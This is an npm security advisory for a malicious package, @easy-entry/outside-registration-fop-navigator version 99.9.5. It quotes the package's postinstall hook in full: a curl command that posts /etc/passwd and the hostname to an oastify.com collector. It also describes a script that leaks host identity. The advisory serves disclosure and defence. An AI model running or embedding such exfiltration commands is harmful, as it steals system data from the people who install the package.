npm · Malicious package advisory
Malware@easy-entry/outside-registration-fop-navigator
MAL-2026-5409
Malicious code in @easy-entry/outside-registration-fop-navigator (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (04091b4e3c6018586c8ba0c6106ff9177090d0776d1a723d041a76d67b1c8f2b) On `npm install`, package.json's postinstall hook executes `node scripts/scream3gg.js && /usr/bin/curl --data '@/etc/passwd' $(hostname).200hj786m7x4kfz1lkr4kmshu80zoqcf.oastify.com`, sending the installer's /etc/passwd contents and hostname to a Burp Collaborator subdomain. In parallel, scripts/scream3gg.js hex-encodes os.hostname(), os.homedir(), and os.userInfo().username and issues a fetch to `http://<hex>.nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com`, leaking installer host identity through DNS/HTTP to the attacker. Both behaviors fire automatically and unconditionally on default install.
Compromised versions (1)
- 99.9.5
Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.